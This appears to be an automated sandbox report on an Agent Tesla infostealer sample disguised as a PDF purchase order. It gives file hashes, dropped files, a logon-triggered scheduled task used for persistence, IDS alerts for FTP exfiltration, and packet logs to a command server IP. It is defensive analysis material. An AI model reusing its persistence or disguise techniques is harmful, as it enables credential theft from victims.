                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380747059108785
                              Encrypted:false
                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                              MD5:4D3B8C97355CF67072ABECB12613F72B
                              SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                              SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                              SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                              Malicious:false
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1571
                              Entropy (8bit):5.084824819183175
                              Encrypted:false
                              SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewnv:HeLwYrFdOFzOz6dKrsuqM
                              MD5:0424C6BB2ACE8FEA2FA428FC388395FD
                              SHA1:6FAFE9DBE4F08F2C467AF00692738A15798E8C02
                              SHA-256:CB29F61E35278D5B145E74829E35368CA03DE2CCE013A380A7C2D035BF75323C
                              SHA-512:D54D3B47898E4465D5A3EEE4EE9B25F6AC73B6160C907DFCA5795CEA1DDD89DFB8D15F8805F87AA833BF75DAE05A9CB69ED07276B368D330F9FDA8458A44CF76
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):685568
                              Entropy (8bit):7.807300447482996
                              Encrypted:false
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              MD5:5D5B5ECC06B9058D0EC3199ED8617CFE
                              SHA1:CBB1A95878E8A7A4AC09270A6DC7699C78996E28
                              SHA-256:0A58B574CCFB2898C4EE47A8DAB29174C2193731573D4578B7B5FF83AD1196D6
                              SHA-512:9044D553F7CE2E00FB15BD718065C6BA1E94162B74DFDE65A69EE472712866B287CCD26B52777D744EDC34B2C2FA465645CB99F3B45DA1E544F122ACB372CA37
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@.................................;...O.......t...........................(d..T............................................ ............... ..H............text....i... ...j.................. ..`.rsrc...t............l..............@..@.reloc...............t..............@..B................o.......H.......`t..`P......(.......h...........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....rC..p~....o......t.....+..*....0..!........(....rI..p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....(....t.........*...0..`........s....}.....s....}.....rS..p}.....rS..p}.....s....}.....s....}......}......}.....( ......($....*.0..i..........o!.....(......(..
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):685568
                              Entropy (8bit):7.807300447482996
                              Encrypted:false
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              MD5:5D5B5ECC06B9058D0EC3199ED8617CFE
                              SHA1:CBB1A95878E8A7A4AC09270A6DC7699C78996E28
                              SHA-256:0A58B574CCFB2898C4EE47A8DAB29174C2193731573D4578B7B5FF83AD1196D6
                              SHA-512:9044D553F7CE2E00FB15BD718065C6BA1E94162B74DFDE65A69EE472712866B287CCD26B52777D744EDC34B2C2FA465645CB99F3B45DA1E544F122ACB372CA37
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@.................................;...O.......t...........................(d..T............................................ ............... ..H............text....i... ...j.................. ..`.rsrc...t............l..............@..@.reloc...............t..............@..B................o.......H.......`t..`P......(.......h...........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....rC..p~....o......t.....+..*....0..!........(....rI..p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....(....t.........*...0..`........s....}.....s....}.....rS..p}.....rS..p}.....s....}.....s....}......}......}.....( ......($....*.0..i..........o!.....(......(..
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.807300447482996
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:z38PO_20248099-1_pdf.exe
                              File size:685'568 bytes
                              MD5:5d5b5ecc06b9058d0ec3199ed8617cfe
                              SHA1:cbb1a95878e8a7a4ac09270a6dc7699c78996e28
                              SHA256:0a58b574ccfb2898c4ee47a8dab29174c2193731573d4578b7b5ff83ad1196d6
                              SHA512:9044d553f7ce2e00fb15bd718065c6ba1e94162b74dfde65a69ee472712866b287ccd26b52777d744edc34b2c2fa465645cb99f3b45da1e544f122acb372ca37
                              SSDEEP:12288:3dPwqNxtOB37QmJauif0txmkuhIak+eBn7Hxz0Kt0rAt7HclhUhlru4TscPm:6OW37QVf0PRu9Qndz0hAtTclhUhldsc+
                              TLSH:62E41225321ADB12D0A60BB210B2D2B41BB59E9D2402D3038EEF7EFF797679156817D3
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..j............... ........@.. ....................................@................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x4a898e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F11FEC [Mon Sep 23 07:59:40 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa893b | 0x4f | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x674 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa6428 | 0x54 | .text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x2000 | 0xa6994 | 0xa6a00 | 045c22e41300f948252472d761023d08 | False | 0.9178266246249063 | data | 7.8170394032595425 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc | 0xaa000 | 0x674 | 0x800 | dc1bb465dc7c5cc3c2b68f490aac9b70 | False | 0.3427734375 | data | 3.5397571549190485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0xac000 | 0xc | 0x200 | 23607fd5c69ca257467b834002b79656 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_VERSION | 0xaa090 | 0x3e4 | data |  |  | 0.39558232931726905
                              RT_MANIFEST | 0xaa484 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
                              DLL | Import
                              mscoree.dll | _CorExeMain
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-09-25T14:42:33.783691+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49717 | 110.4.45.197 | 21 | TCP
                              2024-09-25T14:42:34.626804+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49719 | 110.4.45.197 | 58009 | TCP
                              2024-09-25T14:42:34.633344+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49719 | 110.4.45.197 | 58009 | TCP
                              2024-09-25T14:42:39.600523+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49723 | 110.4.45.197 | 21 | TCP
                              2024-09-25T14:42:40.450522+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49726 | 110.4.45.197 | 53264 | TCP
                              2024-09-25T14:42:40.459740+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49726 | 110.4.45.197 | 53264 | TCP
                              2024-09-25T14:42:48.225577+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 55430 | 110.4.45.197 | 21 | TCP
                              2024-09-25T14:42:49.076789+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 55431 | 110.4.45.197 | 54539 | TCP
                              2024-09-25T14:42:49.082015+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 55431 | 110.4.45.197 | 54539 | TCP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Sep 25, 2024 14:42:37.601607084 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.606452942 CEST5708849724110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.606532097 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.606585979 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.611352921 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.912306070 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:37.912535906 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:37.917402029 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.265619040 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.265788078 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.270566940 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.431421041 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.453553915 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.458750010 CEST5708849724110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.460557938 CEST4972457088192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.482527018 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.591711998 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.592644930 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.597621918 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.783453941 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.785008907 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.789844036 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.938766003 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:38.939066887 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:38.943948984 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.112016916 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.119362116 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.124424934 CEST5489149725110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.124506950 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.124619007 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.130100965 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.267407894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.267564058 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.272524118 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.594686031 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.595324993 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.600353003 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.600446939 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.600522995 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.605353117 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.956085920 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.956338882 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.961500883 CEST5489149725110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:39.961580038 CEST4972554891192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:39.998111963 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.285213947 CEST2149717110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.326210022 CEST4971721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.450242043 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.450521946 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.452512980 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.455465078 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.457782030 CEST5326449726110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.459739923 CEST4972653264192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.498110056 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.790472984 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:40.825231075 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:40.830246925 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.153971910 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.188102961 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.193123102 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:41.194629908 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.201292038 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.208826065 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:41.213665009 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.020953894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.021167994 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.021202087 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.026232004 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.026773930 CEST5618955427110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.026818037 CEST5542756189192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.076210022 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.350935936 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.351356030 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.357284069 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.679596901 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.680042028 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.685103893 CEST6504455428110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:42.685179949 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.685287952 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:42.690208912 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:43.132358074 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.132409096 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.132572889 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.135869980 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.135888100 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.585841894 CEST2149723110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:43.625462055 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.625572920 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.627717972 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.627749920 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.628609896 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.638744116 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:43.670002937 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.679562092 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.723428965 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791080952 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791162014 CEST44355429172.67.74.152192.168.2.9
                              Sep 25, 2024 14:42:43.791234016 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:43.794167995 CEST55429443192.168.2.9172.67.74.152
                              Sep 25, 2024 14:42:44.893953085 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:44.900595903 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:44.900697947 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.251916885 CEST4972321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.252820969 CEST5542865044192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.758148909 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:45.762273073 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:45.767213106 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.101133108 CEST2155430110.4.45.197192.168.2.9
